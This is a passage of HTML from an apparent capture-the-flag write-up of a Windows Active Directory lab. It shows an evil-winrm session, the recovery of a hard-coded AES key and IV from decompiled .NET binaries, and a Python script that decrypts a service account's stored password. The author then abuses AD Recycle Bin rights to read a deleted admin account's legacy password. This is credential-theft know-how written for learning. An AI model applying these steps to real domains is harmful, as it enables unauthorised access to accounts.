class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACRUlEQVR42kWS6W7bMBCE9SRNHMfWQZEixUun7zh2UidNEQTpj77/Y0xHTov+WEDEirPz7TBZ2CMW8Q2L/hOiOWN/fsfh6QPHyyfGhzfE4RFV1WBRNshlA2s7FLpD5jZI9YCl7Nibqr1+J3r8gPJ71O0Bw+4Vw/aCMJzguiNks4c/v8HsnpD5LWbdG8TuE258hnJrlHbDu1vWBjruUdQbJGn3GwvRQVQDVrsXrA+vqNk0YQfJC5vTO/x4xjyPSN0Bdn1Bs3pG6B/Rj0eEuIKsWmjTIS8Mkiz8wG3WIKNl1/KH/oTSrCH0CrkaEPsztNthtvRQwiFUFvPMYZE7tKbG2mlIoZFnFYKSSKQ/oSg5nYImED0c6HZEwcq5k+ks6zXusoBCBrTOYUa3N6xvqac4B6QWQli4qkZi2guMDhTsYJsHeO6u1ONVNJc9Qneiwy1usohtWeOXUejuK3RzhUtRwqSOPQbG0JRqkKj4AkfBYkKmYCC2JK6oiCyJPJxhPJHTAKs8nLRYEr/gAFcGZEXEjIITpWY/Mf1PlDwsGczkpqGA5A6l2UCoEe3qO7H3uF0GeO2x9h73FLunyGQkE81VsOSTuiLH9nz9sbURlslOlyfcSWxCtvEAxQF3aYSSEbvgUHGX87RBUwfkIl5DrVREV1skdXxCW3voipb5Hu2/UJhwzr26+ADF93VH5ElotF8OF3mD3v4XlBSMHJBYvvho6JAHNYXB/WXET0WLtGiu+AV3OafDQgRi/RWkiFEBy+ILeQpFq4g/uI5iS4LKH8oAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="s.smith list shares" title="" src="/static/df90a7408c0a17e3b2004a4d3b891d66/50637/s-smith-list-shares.png" srcset="/static/df90a7408c0a17e3b2004a4d3b891d66/dda05/s-smith-list-shares.png 158w, /static/df90a7408c0a17e3b2004a4d3b891d66/679a3/s-smith-list-shares.png 315w, /static/df90a7408c0a17e3b2004a4d3b891d66/50637/s-smith-list-shares.png 630w, /static/df90a7408c0a17e3b2004a4d3b891d66/5afa3/s-smith-list-shares.png 726w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Within the <code class="language-text">evil-winrm</code> shell, I downloaded the <code class="language-text">Audit</code> share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 619px; " > <a class="gatsby-resp-image-link" href="/static/c6d1d7399ed0c9c658035a599d175d63/98e8d/download-audit-share.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.0253164556962%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB20lEQVR42oVT13bUUAz0l4TEbd17722deGFJAoT//5NBuk7bEA4PcyzLntHVSFcyrAymmcI2EjhOCiuoYEU9bIIT9zCDFppTQrHyv6Ay7OwC0rXqwwlreGkHK2yFmJ/N9D7CS0bIZkbYBfZ4x4Wo9U7Q8GtoNiUPERTNh6wHOHg1iXfidBy/kA2/EXifuxAlSHl3EkSuyh8UEvTjFkX/FXm3IW3uXk/EcdZuSOpbOk3xQfRZMCqPwi8m6W6F8e4nhuM9wnxCOZzRzPc7gQSutAjcUVyt+KLHn7QvBFe4z17tgr8wn54EqZrO6JaHV//YVz5lNZ4RFguCfIZJFryJkmCQsfkDboxUCE5C8Df9vAhivz6KoTAppFy//kBLRabtScS8CS+CMm2L5EcNHFqVa9mFG5QYlzO1/CAmXPTfBGknZOiOj8IStoELNdN38Sz6E7JmE1siqVZJvZPB5j4tjfZRNSKoZkLTL8QOsiB3wNNlcE5nuOXbO3XHkGI9QWbEaMjkPghR1gMqmnDV3qIZNpT9hpgG50TdxR7+C9LBamHYLUyHboXHN2OAGU5UuYMRLbBiMj6eYCYrlA+r8hkkxZ2huBOUgAj+usce5aiAbNWQ7YpAbdsNEf4v+AfETXzm6hQjlgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="s.smith download shares" title="" src="/static/c6d1d7399ed0c9c658035a599d175d63/98e8d/download-audit-share.png" srcset="/static/c6d1d7399ed0c9c658035a599d175d63/dda05/download-audit-share.png 158w, /static/c6d1d7399ed0c9c658035a599d175d63/679a3/download-audit-share.png 315w, /static/c6d1d7399ed0c9c658035a599d175d63/98e8d/download-audit-share.png 619w" sizes="(max-width: 619px) 100vw, 619px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The files in the share looked to be a .NET application:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c38578995670039d54c994607c488f23/4ad3e/audit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB6klEQVR42o1T2XKbQBDkSxJjG4EAIa6FXXFYnJZl60hSlaQqlf//jM7MIpw4lZT80DW7HL3dM73GfdziLjvAjHYw/Qp+ukVWPUFUO41kM9L+EZHqcO9lV2H4SYNINsjLEYnq4QQFPlgxbuwUH+0EN05K6wQm1XcRRmrESh1JCamQA9ywwu0yw52b0wdygn+pXn6dcJ11SMsnlN0Jm+YAN66xWG00mPQV3oRrpEZCCmVz0oRFe4TaviCv90iLR9hkf1b7XlIjlD1c9RlhPiAQDdUeIal2o/qtwr/wP1LDot54aYdYMlGLWA2a0CbLpiO0QtPJ3iplQo1/EDp+Bi+q4MUPsOjUWeUyLEllRbXS1VmXr2S3Lh8wE/NB4g9C0cPKzxD9TxTDF9TtHmXzogfEPeV+llQFZZMnbflqwiUBXG29zzWMTXvCw3BG3R0wPn+lekTKuSQiDnUgWhrQToed90zOAwzzjg48QNbPKGiQqqb31C6Dm7+mgSzpxnhJi4BjVIwQ9PMqbbRVbgdbZ4uzwnnNKnm98OWkcEEklvyEsPkBNX5HRyr7/TeyfER1yWbVn5GRYs6mfckogwl/1wlGTnnLCppwUmqrsey0TT/ZalWs0tWDISf0POI0kN0V3Xm9J5s8tDUlJBBb/AKqzqB/IYvArwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Audit$ share" title="" src="/static/c38578995670039d54c994607c488f23/50637/audit.png" srcset="/static/c38578995670039d54c994607c488f23/dda05/audit.png 158w, /static/c38578995670039d54c994607c488f23/679a3/audit.png 315w, /static/c38578995670039d54c994607c488f23/50637/audit.png 630w, /static/c38578995670039d54c994607c488f23/4ad3e/audit.png 669w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I started up a Windows VM and transferred <code class="language-text">CascAudit.exe</code> and <code class="language-text">CascCrypto.dll</code> over so that I could look at the decompiled code in ILSpy.</p> <p>After viewing the code, I found a decryption key within <code class="language-text">CascAudit.exe</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9d74eb64cbd24fdbc01f587a60b90c53/4ad3e/CascAudit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 82.91139240506328%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACRElEQVR42o1U7XKjMBDrE7UkAdv4GwwkTUJ7nbn3fxWd1kl6TXszlx8KeDFCu5LzpJWD6xO6rofWFtutIjR2O1XvN3Xdca0/sb1d+exrXfAkm62NeFvfsa4rUip13eqAyPucBTN879GrHs44ROvhbEAIw78IFRRVxlAQ41gJZaO1Cc4l1gbWMlJMrEdoknatQUtIVz8I5WezoUq2PaQZgQQ5DeipRCkLGYk2FtZRIVXtSPSd5AfhjTTnCcfjCXk+YWcnWCpelhHzvGAaJhQf4alaZlznR7R894Y7QplliBNSOSHkPabXX9gfzsQe5bDW+n6acD4eMBbO1EU4n7BpezT8QLP9Rigw2tNpD8/WZFYt2zVs3fSO7XpeQzVMxpK0w2urCF2vC1Mhc/1BmGhOGhZom6FdoQq6HWNF8JnmDRf3+aG9kDFqR93joMSkL4SSLdtHImPXj+hIJs4aGqKoVpKw2Si8NC2aF4Lze+H6uenwzPk310zeKZQ5duEAs/zG/vyOj48V6+kVcxmwTDMiTZEcumsCnIs1at7latC9KVdC5xfE8kZjJrpbUMYRQ5ZIZRIxOmzPXLNouBbSnnPdfTVFIiB5i46t8kEnMWIrzQ1s6XIkr6gC1F3tLoc3whxmKJmhSQxyrpmT0+HYavefQN8Rit0yk05gAs/xpQ3L+Hi67Fyoex4iFHWGmRrDAtW5qrb93KD+nooHyC6EopD5ETU2LYzLDMcTI/8ypYzVFFH/KOlTe3Urxkw3GWZ5+ZsJj6oTwj+zFjSu3UBTbQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CascAudit" title="" src="/static/9d74eb64cbd24fdbc01f587a60b90c53/50637/CascAudit.png" srcset="/static/9d74eb64cbd24fdbc01f587a60b90c53/dda05/CascAudit.png 158w, /static/9d74eb64cbd24fdbc01f587a60b90c53/679a3/CascAudit.png 315w, /static/9d74eb64cbd24fdbc01f587a60b90c53/50637/CascAudit.png 630w, /static/9d74eb64cbd24fdbc01f587a60b90c53/4ad3e/CascAudit.png 669w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, within <code class="language-text">CascCrypto.dll</code>, I found an initialization vector (IV):</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e05c6cf784392f6cf647efe5845c7c67/fb35e/CascCrypto.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACJUlEQVR42o2T3ZKiMBCFfaQVSEJ+gQABdIbRqdn3f5SzJ9F1tuZi9aIrWMpnd38nB+V79FtCmHsI06JR92q/n0V7+1w3CnX9/zpIl5BOF+zvF3jXw9ke1nT4ValHVay6eg4rQGV6NLqHNAM7CWhbi1ZZdLVEz446lqhfgxWgkAbSTYRGnjNinBFch+XYYKsF1kpAEl6xXgJKAnOHInepO2g3II4jXJzQhglhmKC4As1JpNAEPwE2HEnaiPX8iWU9Ic4LDPfonIe1gSdB0qJpKOYVKVUl0XWxSOnmHeO6E5wwxohgPIxsoRU74+9+Vv2zCpC78XZAIqzu3uDSFft+QUordJjLXm2/sFOOrX2RZoxj9w6S8oQKlNkVodnHIY8iGo2hT5jTCdM0Y902ngm+m1gzFH98gzkoQtrWQBOcAY10zKrnM0/uuAAVv/AuwoWRoIhxzEWYv+3SGFvGOR7F85GzZcEMNi3zyPaz5QwcMrAbucuZf7JAcy3ZtHhi+iDyyASOy47IF3vGxbpsN9xPdukzzJer98z0w/Ll4xNDhi5vxbB3Do67ypaVaF8a9x/LzOF6hYwfCOtv7B9XdkzjwwbXJfRDKlKUogxtS4mcTXUTUsRw0gKsCdQmYjt/IZ0vmDfm8O3KoF9wev9k0M9lr4Fj58jkuFjrIWn8FhcGP5/c7fddFoamc6Z86SRbzS9pvlTzPudxj8fbqPn8+1zznj/qftf/AIRXF6JBlpi7AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CascCrypto" title="" src="/static/e05c6cf784392f6cf647efe5845c7c67/50637/CascCrypto.png" srcset="/static/e05c6cf784392f6cf647efe5845c7c67/dda05/CascCrypto.png 158w, /static/e05c6cf784392f6cf647efe5845c7c67/679a3/CascCrypto.png 315w, /static/e05c6cf784392f6cf647efe5845c7c67/50637/CascCrypto.png 630w, /static/e05c6cf784392f6cf647efe5845c7c67/fb35e/CascCrypto.png 883w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I used DB Browser for SQLite to view <code class="language-text">Audit.db</code> which contained the encrypted password for the <code class="language-text">ArkSvc</code> user in the <code class="language-text">Ldap</code> table:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 509px; " > <a class="gatsby-resp-image-link" href="/static/08acc630fc05337db0f70021de0bfd55/31aab/db-encrypted-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 38.60759493670886%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABn0lEQVR42m1S2Y6bQBDkTzZ4MQw3DMxgc4O5DEb2ene1T5Hy/z9RaZA2UpQ8lKanplXVXRplvD7QDSvqdkLTLbj0N3jhGdPyRD/dMd/eIc4NTlmLge5tN1PPAteXKOoRzWXGcL0joR711YGSVwPKdkZ1WXaSxwUc/4T4VBMaiKyHTBuEcUbCNZrhgawaEYoSadEjLXuIpIIbJDiyAEo/rhjWL6wfP7GJM1vA8hI6I9hBijBfMI1kJlMIkWF6/kI7vaFoF1zv75jWD/g8hW5y6BaHsrmXzYSOhE0ngkGkboZIiN84RvcjC3fe8gTFMu9RMOp9OVhQDzYORxevugfN8KGYrqR8LjR2DTvKYPMML3oAjSbV3QQ/jBAq4zvnUxxblpYj94m2LZgTw6BzwzaI4tB68txCygqPKMdn2uJJmbwRVlplqx+yxM2TyMlQZh1iWSOgXsOOSVD8wWaiMHILogIhz9EEJzQk0sU5oUD7XYsCDQmK4AxOYpGo6CdkFEP8F3SKRtHNiDLiO1SqVRbtK/4DM4ZG7xpFoDG+T/M/wd8IFgW/SbkKQwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="encrypted password" title="" src="/static/08acc630fc05337db0f70021de0bfd55/31aab/db-encrypted-password.png" srcset="/static/08acc630fc05337db0f70021de0bfd55/dda05/db-encrypted-password.png 158w, /static/08acc630fc05337db0f70021de0bfd55/679a3/db-encrypted-password.png 315w, /static/08acc630fc05337db0f70021de0bfd55/31aab/db-encrypted-password.png 509w" sizes="(max-width: 509px) 100vw, 509px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the encrypted password, decryption key, and IV, I was able to decrypt the password with the following Python script:</p> <div class="gatsby-highlight" data-language="python"><pre class="language-python"><code class="language-python"><span class="token comment"># decrypt.py</span> <span class="token keyword">from</span> base64 <span class="token keyword">import</span> b64decode <span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>Cipher <span class="token keyword">import</span> AES <span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>Util<span class="token punctuation">.</span>Padding <span class="token keyword">import</span> unpad <span class="token keyword">def</span> <span class="token function">decrypt_string</span><span class="token punctuation">(</span>encrypted_string<span class="token punctuation">,</span> key<span class="token punctuation">)</span><span class="token punctuation">:</span> key <span class="token operator">=</span> key<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span> iv <span class="token operator">=</span> <span class="token string">"1tdyjCbY1Ix49842"</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span> encrypted_bytes <span class="token operator">=</span> b64decode<span class="token punctuation">(</span>encrypted_string<span class="token punctuation">)</span> cipher <span class="token operator">=</span> AES<span class="token punctuation">.</span>new<span class="token punctuation">(</span>key<span class="token punctuation">,</span> AES<span class="token punctuation">.</span>MODE_CBC<span class="token punctuation">,</span> iv<span class="token punctuation">)</span> decrypted_data <span class="token operator">=</span> unpad<span class="token punctuation">(</span>cipher<span class="token punctuation">.</span>decrypt<span class="token punctuation">(</span>encrypted_bytes<span class="token punctuation">)</span><span class="token punctuation">,</span> AES<span class="token punctuation">.</span>block_size<span class="token punctuation">)</span> decrypted_string <span class="token operator">=</span> decrypted_data<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span> <span class="token keyword">return</span> decrypted_string <span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span> <span class="token keyword">try</span><span class="token punctuation">:</span> encrypted_password <span class="token operator">=</span> <span class="token string">"BQO5l5Kj9MdErXx6Q6AGOw=="</span> decrypted_password <span class="token operator">=</span> decrypt_string<span class="token punctuation">(</span>encrypted_password<span class="token punctuation">,</span> <span class="token string">"c4scadek3y654321"</span><span class="token punctuation">)</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Decrypted Password:"</span><span class="token punctuation">,</span> decrypted_password<span class="token punctuation">)</span> <span class="token keyword">except</span> Exception <span class="token keyword">as</span> ex<span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Error decrypting password:"</span><span class="token punctuation">,</span> <span class="token builtin">str</span><span class="token punctuation">(</span>ex<span class="token punctuation">)</span><span class="token punctuation">)</span></code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 352px; " > <a class="gatsby-resp-image-link" href="/static/5d0b078ff7f82402b2492f5d1273201a/ff9f2/decrypt-arksvc-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+0lEQVR42jWPS0/CQBhF+SEuJLQgD9PSaTtthxKm0AcVRUDRIGgUN278/7vjAHFxcpPvS07ubXT6IW1nhu2U2G5tsqI5yGn1EqxuiIwr/DBHJhVBVDDWS3S+Jk5rhkFm7iVDOaN1I7EMjU5YYUevWPGBttpjJe8E+TditEBlD2yej+z2PxTzF+r7ncntmcxIT7lcHdDlhmYnvAhF+oRQC6R+JJwsEXHBev1mRF98fP6aRka6PeJ4Gldobt3xGUdMTKuAq6bDteVh/zeM45xElajRHD/QCN9gJp7meX5Gd6Dwgim+LJhMV0TJ/PxT6R19J8XuStq9yMguDf8AX06IXOXtaJAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="decrypt ArkSvc password" title="" src="/static/5d0b078ff7f82402b2492f5d1273201a/ff9f2/decrypt-arksvc-password.png" srcset="/static/5d0b078ff7f82402b2492f5d1273201a/dda05/decrypt-arksvc-password.png 158w, /static/5d0b078ff7f82402b2492f5d1273201a/679a3/decrypt-arksvc-password.png 315w, /static/5d0b078ff7f82402b2492f5d1273201a/ff9f2/decrypt-arksvc-password.png 352w" sizes="(max-width: 352px) 100vw, 352px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">evil-winrm</code> made a connection as <code class="language-text">arksvc</code> and the user was a member of the <code class="language-text">AD Recycle Bin</code> group which allows members to read objects in AD that have been deleted:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 550px; " > <a class="gatsby-resp-image-link" href="/static/4288440075cc0969b8efef489b83f722/c1dff/arksvc-evil-winrm.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 104.43037974683544%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAADa0lEQVR42nVU6XKbSBjkSRJdIJAEYmC4BAJ0GV12ZNdmk63Uvv9j9PY3yN5EqfzoGpDHPf11N2NN1RpO9gI7/wqn+Bt2tEXRnNFdv2N/+orz6w9Uuxt2xzck5QGjWQp7UcDzc3hBDtfvMZ5lBpYTbuDoM6a6g5td4KgWy2yPtDqToDNwoxoqqaGTEo5fYBqWCKMCWhdQXENVYDK/E078GhO/xXi5x1jWRUMVJT47KT7bCp/sCAMn5irQGLoJ3zUG0wRDL/vAh0Iv2FB+g0WwhR8SyQHz5IQgv2IhyE5YpB2C1Q0+n2fpBcvyBk/xYJK/E/XIYWVRgybfY8cxn1Y7lEWFZbpHsjoiKp4MQv4tXnXQHN/XW9pwRKBbOBzTpQUTj8SuNrB01CIhacmNihvCMMNc1VjqDXz+HvOwsr3yAKqMW8zDNVGbvwVxgzDdwRZ1bk9qtftXHJlozSRH9GXipXdk5t3naM3+ZggGtqhIfwL3mJVk3DuakjBfn5BVR6bIuqzPHKMwm4VQYNMXgeuXrElFlAbOPCdBTKIYI4bWP5NwvX3BtnvjWM/YdX9htlwbQiEZOgmi7IB6+wUhD1Qc730V0tHHweyhgO+WeJTSZNmUVScs401P6PW+LOhnwmCMcmNJ9htMII6iUgVLTkxWTx+nhwxjyn+eiDfTlJWqEFPleygq2VH13gQjno3vo4qfY7eAtTm84uXtX8h6vHzH6foPIpKPOO6QIaiEdTp/M0nLgZpqhVzCGrLgExJN3Nxg7EoPOW5F/2QVrxpCSYWoRJQGrFXId/FUxnZm/PQI28vvZA+EslkIQnonz6IuKTp62ZrN82VtYCp1t0HwP9kDYcuObdhFwaq+YMZqiDrZKGOLhx4rYwL5heQPhEIi/auaZxRM2ZG68CIQNUaR0ytz7mP+jEfS3kN+s1IL8VHGFN+kMu9kok7nT8irC+04mGeB0ruH0XuVVsBPSqoi5i9YanX3VMgEc/42J+lgHJn3EZMXK/7kpSVEokxIJZg077gypGjDey9FyRv6xkvgytvlyJLfuDfnjW3PV336D2lbMq6W4sotTbKyviIvT8hphWxOeeC3Lz9wYU+vhzc8EylDU7ziRP14+mtAlpZPTjxkOEJcrnvCtDgipmfGNxZZLgabwYx4yEBGv4/9mPh/8mCg+8kIbpkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="arksvc evil-winrm" title="" src="/static/4288440075cc0969b8efef489b83f722/c1dff/arksvc-evil-winrm.png" srcset="/static/4288440075cc0969b8efef489b83f722/dda05/arksvc-evil-winrm.png 158w, /static/4288440075cc0969b8efef489b83f722/679a3/arksvc-evil-winrm.png 315w, /static/4288440075cc0969b8efef489b83f722/c1dff/arksvc-evil-winrm.png 550w" sizes="(max-width: 550px) 100vw, 550px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used the <code class="language-text">Get-ADObject</code> cmdlet to view all the properties of deleted AD objects:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/946d8a7c7d8cc3ff753857c612ac0269/2f676/Get-ADObject.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 49.36708860759494%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABy0lEQVR42j1SV3bcMBDTTRKrt1Xv0qpZ2+ys82y/fOT+B0Ew1GY/8IbkDDEYkFoSDyiIJhtQVhPy9oyyv6gYV6+IyhV+OiJR6wV+coSfjQjzmfkVQTbt56zxmNNiJnIWF82GUApZEJNEohP1cNnMPnRqLRdkL2srbJ+wD3s0gwaaUsIOQqB7FXS3fEKI+/UD/fKBdv6FpN4Vh/kEw68V1J0HZK91LKyGqyKVceTQfBQLwXz5Qsl83p1V/GHn+OkUeHELkpSsax7Y72jT6RPL+Qspx7Yo2WCRKd28Gmm9qWbhw0OxJC5mhaTiVOkA3c5gkNxQ5CSct0/c7n9xuv1Bc3xDICrdCpbXIMoX9PMd7fiOYbmjmzgNHyzmyAlJDylrnYykKXQrVlHrp3cc6dNAn6ruioyqTKoTJCU946PJ2mJ3i8pNKtE58n8YTq5U6laioPX0UFSm1QZXXk88lItuTbUjomzmWQM7aOGEnSJXZHb+gBDLI8p5Be31+q3GqvsrAn4Jg0khE4jajVasl29O8RvNcIMvTUlq+92OkPtgjybVat34hpgqMo7nUIXhVE9CUSefvODXyuuT2kfZQqx8mA0HeiwIiYi+elGDf4DQQN5PfTSlAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Get-ADObject" title="" src="/static/946d8a7c7d8cc3ff753857c612ac0269/50637/Get-ADObject.png" srcset="/static/946d8a7c7d8cc3ff753857c612ac0269/dda05/Get-ADObject.png 158w, /static/946d8a7c7d8cc3ff753857c612ac0269/679a3/Get-ADObject.png 315w, /static/946d8a7c7d8cc3ff753857c612ac0269/50637/Get-ADObject.png 630w, /static/946d8a7c7d8cc3ff753857c612ac0269/2f676/Get-ADObject.png 737w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Within the output, I found an attribute (<code class="language-text">cascadeLegacyPwd</code>) for the <code class="language-text">TempAdmin</code> user with a base64 encoded password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ffe2a678bf055dd5c336f090c7012900/a7269/TempAdmin-cascadeLegacyPwd.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.72151898734178%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAChElEQVR42mVSa2/aQBD0P0nxG9v4jZ/YYBswkDZJkzSRKlXq//8T09kDpZHyYXSn097szOxq0/kVw/yMpNzDWBYwvRI6Ty/pEVd7RHwPi1HB9Cvc2RkWbo5vDuGuYbD+M7R+ekSz/Q5n1cBwSUgynYVetEFeTEiyLdJ8h3w9IGeDvDkiLUdU3QlpMUB3Mgr5T6zF+YiMKlJ+Npelgk7EQYM/+0f8vX/D+/SA3+MPzPUBQbZDyCZRTmQ9DBLqdnwFlWsRuztBDcurPghFqRd1aKm86i5YpVv4cY8w7bFKOgSEvK3SG6GVQDdDqk2hHS/vtHD4QhiQIKHqeD1SycD7HiuekrEldYzFpCLDEdCyy3/MVxuOz8iqAxV01wwJKViuWpSbM3ObaXFQNQEHdWeIvRwLe01FhYpHJ5ncF2YEbT+/ohselCIhs5aVwjLcqGEV7UnZd9nAZa5+1PPewYu3cMOedR38ZMf3BrZfiuU3TPMLpuOLykyGlKwnDuqA3f4n+vGRKo8o2zPW9aze8+rEk2+bC5XPJO/hhZXaFG2i5ZIqbGYoNk2RTzvLoEXRnBSBZGZ7tYK1lLNl5g0Vdhxoqyx/o11ZIW2ksqa/sMNGZSeEBvPwaVNUBbGsx8jpcl1SwcD7wObdNUPWm2wk+esWMzwww4wTNIWMBQIhlkyFTJQ7fqPUOX7NHJmlf1VouBWX+hNIrh3Ov0g4weFHS7rdCEVhzpwkN8k0ZVNRt7By5cBwxEn1hVRrujNqrke7uYcjj8xPCL2wxeH8hpl7Gn7Y3X1sge01CkKsC/mNWItl42lPEFCVUkhSlxPbTU/Yjk9UeVIDqjhVyVVQd/doiCgd1SoZN9J/OYrAR23MyB8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="TempAdmin cascadeLegacyPwd" title="" src="/static/ffe2a678bf055dd5c336f090c7012900/50637/TempAdmin-cascadeLegacyPwd.png" srcset="/static/ffe2a678bf055dd5c336f090c7012900/dda05/TempAdmin-cascadeLegacyPwd.png 158w, /static/ffe2a678bf055dd5c336f090c7012900/679a3/TempAdmin-cascadeLegacyPwd.png 315w, /static/ffe2a678bf055dd5c336f090c7012900/50637/TempAdmin-cascadeLegacyPwd.png 630w, /static/ffe2a678bf055dd5c336f090c7012900/a7269/TempAdmin-cascadeLegacyPwd.png 740w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Decoded the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 366px; " > <a class="gatsby-resp-image-link" 